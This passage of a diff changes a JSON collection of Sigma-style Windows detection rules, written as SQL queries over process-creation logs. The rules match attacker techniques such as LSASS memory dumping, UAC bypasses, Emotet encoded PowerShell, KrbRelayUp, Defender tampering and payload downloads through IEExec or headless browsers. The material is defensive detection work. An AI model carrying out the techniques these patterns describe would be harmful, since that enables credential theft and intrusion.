'%\\\\csc.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" + "filename": "proc_creation_win_csc_susp_parent.yml" }, { - "title": "WMIC Remote Command Execution", - "id": "7773b877-5abb-4a3e-b9c9-fd0369b59b00", + "title": "Potential Active Directory Enumeration Using AD Module - ProcCreation", + "id": "70bc5215-526f-4477-963c-a47a5c9ebd12", "status": "experimental", - "description": "Detects the execution of WMIC to query information on a remote 
system", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047" + "attack.reconnaissance", + "attack.discovery", + "attack.impact" ], "falsepositives": [ - "Unknown" + "Legitimate use of the library for administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%/node:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/node:127.0.0.1 %' ESCAPE '\\' OR CommandLine LIKE '%/node:localhost %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\') AND CommandLine LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_remote_execution.yml" + "filename": "proc_creation_win_powershell_active_directory_module_dll_import.yml" }, { - "title": "Potential Raspberry Robin Dot Ending File", - "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", - "status": "experimental", - "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Audio Capture via PowerShell", + "id": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", + "status": "test", + "description": "Detects audio capture via PowerShell Cmdlet.", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.collection", + "attack.t1123" ], "falsepositives": [ - "Unknown" + "Legitimate audio capture by legitimate user." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%WindowsAudioDevice-Powershell-Cmdlet%' ESCAPE '\\' OR CommandLine LIKE '%Toggle-AudioDevice%' ESCAPE '\\' OR CommandLine LIKE '%Get-AudioDevice %' ESCAPE '\\' OR CommandLine LIKE '%Set-AudioDevice %' ESCAPE '\\' OR CommandLine LIKE '%Write-AudioDevice %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" + "filename": "proc_creation_win_powershell_audio_capture.yml" }, { - "title": "Potential Persistence Attempt Via Run Keys Using Reg.EXE", - "id": "de587dce-915e-4218-aac4-835ca6af6f70", - "status": "test", - "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", + "title": "Potential Emotet Activity", + "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", + "status": "stable", + "description": "Detects all Emotet like process executions that are not covered by the more generic rules", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", - "Legitimate administrator sets up autorun keys for legitimate reasons.", - "Discord" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 
'Security' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\' AND CommandLine LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_add_run_key.yml" + "filename": "proc_creation_win_malware_emotet.yml" }, { - "title": "Password Provided In Command Line Of Net.EXE", - "id": "d4498716-1d52-438f-8084-4a603157d131", + "title": "LSASS Memory Dumping", + "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", "status": "test", - "description": "Detects a when net.exe is called with a password in the command line", - "author": "Tim Shelton (HAWK.IO)", + "description": "Detect creation of dump files containing the memory 
space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '%:%\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%/USER:% %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% ' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_use_password_plaintext.yml" + "filename": "proc_creation_win_susp_lsass_dump.yml" }, { - "title": "Abusing IEExec To Download Payloads", - "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", + "title": "Python Spawning Pretty TTY on Windows", + "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", "status": "experimental", - "description": "Detects execution of the IEExec utility to download payloads", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects python spawning a pretty tty", + "author": "Nextron Systems", + "tags": [ + "attack.execution", + "attack.t1059" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR 
CommandLine LIKE '%http://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%python.exe' ESCAPE '\\' OR NewProcessName LIKE '%python3.exe' ESCAPE '\\' OR NewProcessName LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ieexec_download.yml" + "filename": "proc_creation_win_python_pty_spawn.yml" }, { - "title": "Recon Information for Export with Command Prompt", - "id": "aa2efee7-34dd-446e-8a37-40790a66efd7", - "status": "experimental", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "author": "frack113", + "title": "Potential LethalHTA Technique Execution", + "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "status": "test", + "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", + "author": "Markus Neis", "tags": [ - "attack.collection", - "attack.t1119" + "attack.defense_evasion", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tree.com' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\doskey.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') OR OriginalFileName IN ('wmic.exe', 'DOSKEY.EXE', 'sc.exe')) AND (ParentCommandLine LIKE '% > \\%TEMP\\%\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\%TMP\\%\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')" ], - "filename": 
"proc_creation_win_susp_recon.yml" + "filename": "proc_creation_win_mshta_lethalhta_technique.yml" }, { - "title": "Powershell Token Obfuscation - Process Creation", - "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", + "title": "Potential Suspicious Windows Feature Enabled - ProcCreation", + "id": "c740d4cf-a1e9-41de-bb16-8a46a4f57918", "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.009" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the features listed in the rule." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND CommandLine LIKE '%-Online%' ESCAPE '\\' AND CommandLine LIKE '%-FeatureName%' ESCAPE '\\' AND (CommandLine LIKE '%TelnetServer%' ESCAPE '\\' OR CommandLine LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR CommandLine LIKE '%TFTP%' ESCAPE '\\' OR CommandLine LIKE '%SMB1Protocol%' ESCAPE '\\' OR CommandLine LIKE '%Client-ProjFS%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_powershell_token_obfuscation.yml" + "filename": "proc_creation_win_powershell_enable_susp_windows_optional_feature.yml" }, { - "title": "File Download with Headless Browser", - "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", + "title": "PUA - Radmin Viewer Utility Execution", + "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", "status": "test", - "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", - "author": "Sreeman, Florian Roth", + "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.lateral_movement", + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" ], - "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" + "filename": "proc_creation_win_pua_radmin.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - Process", - "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "title": "HackTool - F-Secure C3 Load by Rundll32", + "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "description": "F-Secure C3 produces DLLs with a 
default exported StartNodeRelay function.", + "author": "Alfie Champion (ajpc500)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" }, { - "title": "Use NTFS Short Name in Image", - "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", + "title": "HackTool - KrbRelayUp Execution", + "id": "12827a56-61a4-476a-a9cb-f3068f191073", "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. 
Which could be used as a method to avoid Image based detection", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%~1.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~1.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~1.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~1.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~1.js%' ESCAPE '\\' OR NewProcessName LIKE '%~1.hta%' ESCAPE '\\' OR NewProcessName LIKE '%~2.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~2.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~2.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~2.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~2.js%' ESCAPE '\\' OR NewProcessName LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentProcessName LIKE '%-installer.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE 
'% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" + "filename": "proc_creation_win_hktl_krbrelayup.yml" }, { - "title": "Chopper Webshell Process Pattern", - "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", - "status": "experimental", - "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", - "author": "Florian Roth (Nextron Systems), MSTI (query)", + "title": "File Download with Headless Browser", + "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", + "status": "test", + "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. 
This can be used by threat actors to download files.", + "author": "Sreeman, Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_webshell_chopper.yml" + "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" }, { - "title": "XSL Script Processing", - "id": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", + "title": "Potential Arbitrary File Download Via MSEdge.EXE", + "id": "94771a71-ba41-4b6e-a757-b531372eaab6", "status": "test", - "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. 
Rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects usage of the \"msedge.exe\" binary as a LOLBIN to download arbitrary file via the CLI", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1220" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.", - "Msxsl.exe is not installed by default, so unlikely.", - "Static format arguments - https://petri.com/command-line-wmi-part-3" + "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%/format%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%/Format:List%' ESCAPE '\\' OR CommandLine LIKE '%/Format:htable%' ESCAPE '\\' OR CommandLine LIKE '%/Format:hform%' ESCAPE '\\' OR CommandLine LIKE '%/Format:table%' ESCAPE '\\' OR CommandLine LIKE '%/Format:mof%' ESCAPE '\\' OR CommandLine LIKE '%/Format:value%' ESCAPE '\\' OR CommandLine LIKE '%/Format:rawxml%' ESCAPE '\\' OR CommandLine LIKE '%/Format:xml%' ESCAPE '\\' OR CommandLine LIKE '%/Format:csv%' ESCAPE '\\'))) OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR OriginalFileName = 'msedge.exe') AND (CommandLine LIKE '%.exe http%' ESCAPE '\\' OR CommandLine LIKE '%msedge http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_xsl_script_processing.yml" + "filename": "proc_creation_win_browsers_msedge_arbitrary_download.yml" }, { - "title": 
"Tor Client/Browser Execution", - "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", - "status": "test", - "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", - "author": "frack113", + "title": "Tamper Windows Defender Remove-MpPreference", + "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", + "status": "experimental", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\tor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_browsers_tor_execution.yml" + "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" }, { - "title": "NodejsTools PressAnyKey Lolbin", - "id": "a20391f8-76fb-437b-abc0-dba2df1952c6", + "title": "UAC Bypass WSReset", + "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", "status": "test", - "description": "Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass via WSReset usable by 
default sysmon-config", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Other tools with the same command line flag combination", - "Legitimate uses as part of Visual Studio development" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Microsoft.NodejsTools.PressAnyKey.exe normal %' ESCAPE '\\' OR (CommandLine LIKE '%.exe normal %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\Microsoft\\\\NodeJsTools\\\\NodeJsTools%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_lolbin_pressaynkey.yml" + "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" }, { - "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", - "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "title": "PUA - Process Hacker / System Informer Execution", + "id": "811e0002-b13b-4a15-9d00-a613fce66e42", "status": "experimental", - "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], "falsepositives": [ - "Case in which administrators are allowed to use ScreenConnect's Backstage mode" + "Sometimes used by developers or system administrators for debugging purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = 
'4688' AND Channel = 'Security' AND ParentProcessName LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE 